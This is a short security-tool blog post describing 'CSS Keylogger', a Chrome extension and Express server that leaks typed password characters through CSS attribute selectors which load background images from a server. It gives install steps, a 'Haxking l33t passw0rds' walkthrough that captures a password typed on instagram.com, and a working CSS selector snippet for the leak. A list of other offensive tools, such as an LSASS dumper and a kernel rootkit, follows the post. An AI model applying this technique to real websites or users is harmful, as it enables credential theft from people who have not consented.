Categories: Kali Linux

CSS Keylogger – Chrome Extension And Express Server That Exploits Keylogging Abilities Of CSS

CSS Keylogger is a Chrome extension and Express server that exploits keylogging abilities of CSS. Using a simple script one can create a css file that will send a custom request for every ASCII character.

Setup Chrome extension

  1. Download repository git clone https://github.com/maxchehab/CSS-Keylogging
  2. Visit chrome://extensions in your browser (or open up the Chrome menu by clicking the icon to the far right of the Omnibox: The menu’s icon is three horizontal bars. and select Extensions under the More Tools menu to get to the same place).
  3. Ensure that the Developer mode checkbox in the top right-hand corner is checked.
  4. Click Load unpacked extension… to pop up a file-selection dialog.
  5. Select the css-keylogger-extension in the directory which you downloaded this repository.

Also Read Volatility Framework – Volatile memory extraction utility framework

Setup Express server

  1. yarn
  2. yarn start

Haxking l33t passw0rds

  1. Open a website that uses a controlled component framework such as React. https://instagram.com.
  2. Press the extension C on the top right of any webpage.
  3. Type your password.
  4. Your password should be captured by the express server.

How CSS Keylogger works

This attack is really simple. Utilizing CSS attribute selectors, one can request resources from an external server under the premise of loading a background-image.

For example, the following css will select all input’s with a type that equals password and a value that ends with a. It will then try to load an image from here.

input[type="password"][value$="a"] {
  background-image: url("http://localhost:3000/a");
}

R K

Recent Posts

Bomber : Navigating Security Vulnerabilities In SBOMs

bomber is an application that scans SBOMs for security vulnerabilities. So you've asked a vendor…

1 day ago

EmbedPayloadInPng : A Guide To Embedding And Extracting Encrypted Payloads In PNG Files

Embed a payload within a PNG file by splitting the payload across multiple IDAT sections.…

1 day ago

Exploit Street – Navigating The New Terrain Of Windows LPEs

Exploit-Street, where we dive into the ever-evolving world of cybersecurity with a focus on Local…

3 days ago

ShadowDumper – Advanced Techniques For LSASS Memory Extraction

Shadow Dumper is a powerful tool used to dump LSASS (Local Security Authority Subsystem Service)…

4 days ago

Shadow-rs : Harnessing Rust’s Power For Kernel-Level Security Research

shadow-rs is a Windows kernel rootkit written in Rust, demonstrating advanced techniques for kernel manipulation…

2 weeks ago

ExecutePeFromPngViaLNK – Advanced Execution Of Embedded PE Files via PNG And LNK

Extract and execute a PE embedded within a PNG file using an LNK file. The…

3 weeks ago